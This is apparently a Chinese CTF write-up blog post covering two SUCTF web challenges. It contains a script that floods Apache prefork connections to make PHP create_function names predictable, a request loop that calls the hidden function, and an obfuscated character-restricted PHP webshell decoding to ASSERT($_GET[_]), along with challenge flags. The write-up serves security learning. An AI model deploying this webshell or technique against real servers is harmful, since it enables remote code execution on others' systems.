<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="Anonymous"><a href="#Anonymous" class="headerlink" title="Anonymous"></a>Anonymous</h3><p>php代码：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line">$MY = create_function(<span class="string">""</span>,<span class="string">"die(`cat flag.php`);"</span>);</div><div class="line">$hash = bin2hex(openssl_random_pseudo_bytes(<span class="number">32</span>));</div><div class="line"><span class="keyword">eval</span>(<span class="string">"function SUCTF_$hash()&#123;"</span></div><div class="line">    .<span class="string">"global \$MY;"</span></div><div class="line">    .<span class="string">"\$MY();"</span></div><div class="line">    .<span class="string">"&#125;"</span>);</div><div class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'func_name'</span>]))&#123;</div><div class="line">    $_GET[<span class="string">"func_name"</span>]();</div><div class="line">    <span class="keyword">die</span>();</div><div class="line">&#125;</div><div class="line">show_source(<span class="keyword">__FILE__</span>);</div></pre></td></tr></table></figure></p>
<p><code>create_function()</code>函数可以创建一个匿名函数，但当匿名函数创建之后，他自己也有对应的名称。</p>
<p><code>\x00lambda_%d</code>,<code>%d</code>代表他是当前进程中的第几个匿名函数，但是他是无法预测的，我们不知道当前进程中还有多少匿名函数。</p>
<p><code>func_name=phpinfo</code>，查看phpinfo，apache使用了prefork的mod，在这个模式下，apache会重开进程来处理大量的请求，这样就可以预测<code>%d</code>了。</p>
<p>orange师傅的fork脚本<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># coding: UTF-8</span></div><div class="line"><span class="comment"># Author: orange@chroot.org</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> requests</div><div class="line"><span class="keyword">import</span> socket</div><div class="line"><span class="keyword">import</span> time</div><div class="line"><span class="keyword">from</span> multiprocessing.dummy <span class="keyword">import</span> Pool <span class="keyword">as</span> ThreadPool</div><div class="line"><span class="keyword">try</span>:</div><div class="line">    requests.packages.urllib3.disable_warnings()</div><div class="line"><span class="keyword">except</span>:</div><div class="line">    <span class="keyword">pass</span></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(i)</span>:</span></div><div class="line">    <span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">        HOST = <span class="string">'web.suctf.asuri.org'</span></div><div class="line">        PORT = <span class="number">81</span></div><div class="line">        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</div><div class="line">        s.connect((HOST, PORT))</div><div class="line">        s.sendall(<span class="string">'GET / HTTP/1.1\nHost: 127.0.0.1\nConnection: Keep-Alive\n\n'</span>)</div><div class="line">        <span class="comment"># s.close()</span></div><div class="line">        <span class="keyword">print</span> <span class="string">'ok'</span></div><div class="line">        time.sleep(<span class="number">0.5</span>)</div><div class="line"></div><div class="line">i = <span class="number">8</span></div><div class="line">pool = ThreadPool( i )</div><div class="line">result = pool.map_async( run, range(i) ).get(<span class="number">0xffff</span>)</div></pre></td></tr></table></figure></p>
<p>getflag：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> requests</div><div class="line"></div><div class="line"><span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">    r=requests.get(<span class="string">"http://web.suctf.asuri.org:81/?func_name=\x00lambda_1"</span>).content</div><div class="line">    <span class="keyword">if</span> <span class="string">'&#123;'</span> <span class="keyword">in</span> r:</div><div class="line">        <span class="keyword">print</span> r</div><div class="line">        <span class="keyword">break</span></div></pre></td></tr></table></figure></p>
<p><code>SUCTF{L4GsMqu6gu5knFnCi2Te8SjSucxKfQj6tuPJokoFhTCJjpa6RSfK}</code></p>
<h3 id="Getshell"><a href="#Getshell" class="headerlink" title="Getshell"></a>Getshell</h3><p>绕过黑名单的题目，测试可用字符有<code>~[]()=_;.</code>，用这些组成一个shell。</p>
<p>摘自findneo师傅的<a href="https://findneo.tech/180527suctf/" target="_blank" rel="external">blog</a><br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?</span>= $_=_==_;$__=~一[$_];$___=~了[$_];$____=~端[$_];$_____=~得[$_];$______=~第[$_];$_______=~学[$_];$_=_.$__.$___.$____;$_=$$_;$__=$_____.$______.$______.$___.$_______.$____;$__($_[_]);</div></pre></td></tr></table></figure></p>
<p>分析<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?</span>= </div><div class="line">$_=_==_;<span class="comment">//1</span></div><div class="line">$__=~一[$_];<span class="comment">//G</span></div><div class="line">$___=~了[$_];<span class="comment">//E</span></div><div class="line">$____=~端[$_];<span class="comment">//T</span></div><div class="line">$_____=~得[$_];<span class="comment">//A</span></div><div class="line">$______=~第[$_];<span class="comment">//S</span></div><div class="line">$_______=~学[$_];<span class="comment">//R</span></div><div class="line">$_=_.$__.$___.$____;<span class="comment">//_GET</span></div><div class="line">$_=$$_;<span class="comment">//$_GET</span></div><div class="line">$__=$_____.$______.$______.$___.$_______.$____;<span class="comment">//ASSERT</span></div><div class="line">$__($_[_]);<span class="comment">//ASSERT($_GET[_]);</span></div><div class="line"></div><div class="line">------------------------------------------------------</div><div class="line">http:<span class="comment">//web.suctf.asuri.org:82/upload/54add22477b7aec5a09a6e2a280464fb.php</span></div><div class="line">?_=phpinfo();</div></pre></td></tr></table></figure></p>
<p><code>SUCTF{KyGeBLWoF9MXcdDKBdbw2B54sMxbsxyXBpm8t5nQUHBJKuAYEd6o}</code></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
            <a href="/tags/Writeup/" rel="tag"># Writeup</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/01/Sql注入绕过姿势/" rel="next" title="Sql注入绕过姿势">
                <i class="fa fa-chevron-left"></i> Sql注入绕过姿势
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/11/01/Wordpress插件渗透测试/" rel="prev" title="Wordpress插件渗透测试">
                Wordpress插件渗透测试 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="https://raw.githubusercontent.com/Windylh/image/master/logo.jpg"
               alt="Windylh" />
          <p class="site-author-name" itemprop="name">Windylh</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">25</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">11</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/Windylh" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/WindylhPeng" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/u/1553700980" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  Weibo
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://blog.izilong.net/" title="Zilong" target="_blank">Zilong</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://iwenhu.cn/" title="Mengchen" target="_blank">Mengchen</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://keysking.github.io/" title="Keysking" target="_blank">Keysking</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://lanvnal.com/" title="LANVNAL" target="_blank">LANVNAL</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://wsimp1er.com/" title="Simp1er" target="_blank">Simp1er</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Misc"><span class="nav-number">1.</span> <span class="nav-text">Misc</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SandGame"><span class="nav-number">1.1.</span> <span class="nav-text">SandGame</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Game"><span class="nav-number">1.2.</span> <span class="nav-text">Game</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Web"><span class="nav-number">2.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Anonymous"><span class="nav-number">2.1.</span> <span class="nav-text">Anonymous</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Getshell"><span class="nav-number">2.2.</span> <span class="nav-text">Getshell</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2017.3 - 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Windylh</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  






  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("G38Wjo4XURoegldByMbpMI2C-gzGzoHsz", "PAvMrVY87vPwX9PBcMLfYmw4");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
